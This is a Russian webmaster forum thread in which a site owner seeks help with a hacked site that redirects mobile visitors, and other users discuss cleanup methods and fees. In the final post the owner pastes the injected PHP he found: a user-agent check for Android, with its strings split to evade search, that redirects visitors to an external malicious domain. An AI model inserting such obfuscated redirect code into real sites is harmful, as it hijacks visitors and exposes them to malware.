Сайт взломали. Стоит редирект для андроидов и айфонов.

(Ответов: 28, Просмотров: 5405)
Страница 2 из 3 Первая 123 Последняя
  1. Гуру
    • Регистрация: 09.10.2011
    • Сообщений: 1,813
    • Репутация: 251
    DarkTower, пообщайтесь если есть форум с другими учасниками хостера. Возможно сам хостер взломан. Ищите шифрованные части в скриптах.
    • 0
  2. Banned
    • Регистрация: 16.12.2009
    • Сообщений: 395
    • Репутация: 83
    • Webmoney BL: ?
    Цитата Сообщение от DarkTower Посмотреть сообщение
    Скачал все файлы, проверил через тоталком, ничего не нашёл. Чел на другом форуме за поиск и удаление вредоносного кода заломил 40$
    Ну если тебя успокоит, то я заломил бы $30
    Но это в случае, если на твоем хостинг аке только один сайт.
    Так то если к примеру 3 сайта то, логично, заражение в легкую может идти с кого то из своих "не зараженных" сайтов.
    • 0
  3. Sunshine reggae Аватар для OKyJIucT
    • Регистрация: 02.09.2011
    • Сообщений: 3,240
    • Репутация: 1830
    • Webmoney BL: ?
    HeavyHell, какие все корыстные. 5 минут времени 30 баксов. Я бы и бесплатно почистил, а благодарность это уже на совести пострадавшего) Мне не тяжело, зато у людей будет впечатление хорошее, рекомендовать будут как знающего специалиста и просто хорошего человека, а не "совсем зажрались, дешевле будет удалить все и заново установить".

    Это как с таксистами было (просто для сравнения) - в США 11 сентября людей все бесплатно возили, а наши сволочи во время похожей ситуации в 2-3 раза цену подняли. И вот сейчас компании, которые стекла продают в Челябинске, подняли стоимость на 30-50%. На кол таких сажать надо - у людей беда, а они суки на этом наживаются. Именно из-за таких людей никогда не будет у нас взаимоуважения, доверия, да и в целом благополучия.
    • 8

    Спасибо сказали:

    Boss199999(20.02.2013), DarkTower(23.02.2013), G00D(19.02.2013), HeavyHell(19.02.2013), Myroslav(19.02.2013), schtr(18.03.2013), zelez(17.03.2013), zerokl(20.02.2013),
  4. Опытный Аватар для codename
    • Регистрация: 15.09.2010
    • Сообщений: 435
    • Репутация: 100
    • Webmoney BL: ?
    а если посмотреть последние измененные файлы, и их заменить из бэкапа?
    • 0
  5. Banned
    • Регистрация: 16.12.2009
    • Сообщений: 395
    • Репутация: 83
    • Webmoney BL: ?
    OKyJIucT, не в обиду... я бы тоже почистил бесплатно.... только вот я как бэ описываю ситуацию.
    1) на хост-аке - 500 сайтов у конкретно одного пользователя.
    2) я бесплатно почищу один единственный сайт, что возможно реально займет 5 минут времени, а не окажется что стоит что нить доброе, где в шаблоне к примеру будут зашиты закодированные функции которые придется так же проверять.
    3) у недоброго человека шел или бэкдор залит на смежном сайте, где он не светится чем нить левым.
    4) завтра недобрый человек замечает что его фуфел отсутствует и все возвращает, да еще пяток сайтов раскрашивает под свои нужды
    5) послезавтра человек которому бесплатно помог открывает тред что я редиска и воспользовавшись его доверием навешал левого.
    6) я мудак ну и далее по тексту, куча флуда и оправданий...
    Вот так в худшем варианте может произойти при не корыстности.
    а так то, те кто со мной работал, за редким исключением обращаются снова и так как и говоришь рекомендуют знакомым.
    И поверь наслово, бывает так, что стукнутся, надо сделать то и то - сделаю, спрашивают сколько денег - отвечаю не надо.
    зы сори за оффтоп, однако накипело
    • 1

    Спасибо сказали:

    OKyJIucT(19.02.2013),
  6. Дипломник Аватар для Saymon
    • Регистрация: 19.06.2012
    • Сообщений: 106
    • Репутация: 13
    • Webmoney BL: ?
    Вот обсуждение данной уязвимости, половина воды и флуда но есть и интерестное. Кстате сам автор тоже отписывался.
    • 1

    Спасибо сказали:

    5Nizza(20.02.2013),
  7. Гуру Аватар для Brovik
    • Регистрация: 05.02.2012
    • Сообщений: 1,045
    • Репутация: 483
    • Webmoney BL: ?
    хм...сегодня как раз удалял на дле зловред, но там какой-то недохакер работал,слишком просто.
    В шаблоне главной странице ищем ява скрипт, закомментить и ок все будет.
    Обнаружил чисто случайно)
    Собственно еще раз меня убедило некогда этим движком не пользоваться.
    Мало того что боты его очень любят, так еще и ломают чуть ли не каждый месяц)))))

    ПыСы сайт не мой, друга. Сам с дле совсем не работаю.
    • 0
  8. Banned
    • Регистрация: 16.02.2013
    • Сообщений: 47
    • Репутация: 8
    Стукни за 5$ проверю, пиши icq 872910
    • -3
  9. Опытный Аватар для zerokl
    • Регистрация: 04.02.2012
    • Сообщений: 394
    • Репутация: 118
    • Webmoney BL: ?
    jaccuzi, ей богу как дети :)
    DarkTower проверяйте так же файл index.php а лучше скачивайте файлы сайта к себе на пк и ищите код через программу @Text Replacer так же код повторяется по 2-3 раза
    Так же готов помочь форумчанину бесплатно


    OKyJIucT, а вы не привыкли к этому ? Европа в плане взаимо помощи между граждан обходит нас на порядок, как пример идет человек упал потерял создание 2 варианта развития событий (Из жизни).
    1. Россия (общарят карманы, если начнешь приходить в себя дадут по башке).
    2. Европа (по возможности окажут пп, вызовут 911 сопроводят в больницу).
    Вот и делайте выводы :) в России главное денег в карман любыми средствами.
    Последний раз редактировалось zerokl; 20.02.2013 в 12:59.
    • 0

    Спасибо сказали:

    OKyJIucT(20.02.2013),
  10. Дипломник Аватар для DarkTower
    • Регистрация: 14.08.2011
    • Сообщений: 193
    • Репутация: 93
    • Webmoney BL: ?
    Вообщем всем спасибо за отзывы. Нашёл сегодня за пару минут зловредный код в index.php, engine.php и init.php. Вот собственно и сам код.

    if(strchr($_SERVER['H'.'TTP_'.'US'.'ER_A'.'GE'.'NT'],'An'.'dr'.'oid'))
    {header('Loc'.'ation: ht'.'tp:/'.'/ref'.'resh-b'.'rowse'.'r.00'.'xf'.'f.net/');die();}

    Я искал в поиске по файлам слово "Android", как видно не находило потому что он ковычками разбит был. По дате изменений не мог найти, так как я в этих файлах уже удалял один код, который был описан на первых страницах темы.

    Да и в некоторых файлах когда я вначале смотрел дата изменений была 1970 год:) Всем спасибо, кто помог или хотел помочь! Тему можно закрывать.
    • 1

    Спасибо сказали:

    OKyJIucT(23.02.2013),
Страница 2 из 3 Первая 123 Последняя

Похожие темы

Темы Раздел Ответов Последний пост
Помогите, взломали сайт
Консультации по безопасности 16 28.01.2013 10:53
Взломали сайт
WordPress 11 14.10.2012 14:08
Взломали сайт!
Web программирование 17 15.09.2011 00:09
Взломали сайт
Web программирование 25 03.09.2011 02:15
Взломали сайт. Где искать
Web программирование 4 23.12.2010 11:09

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры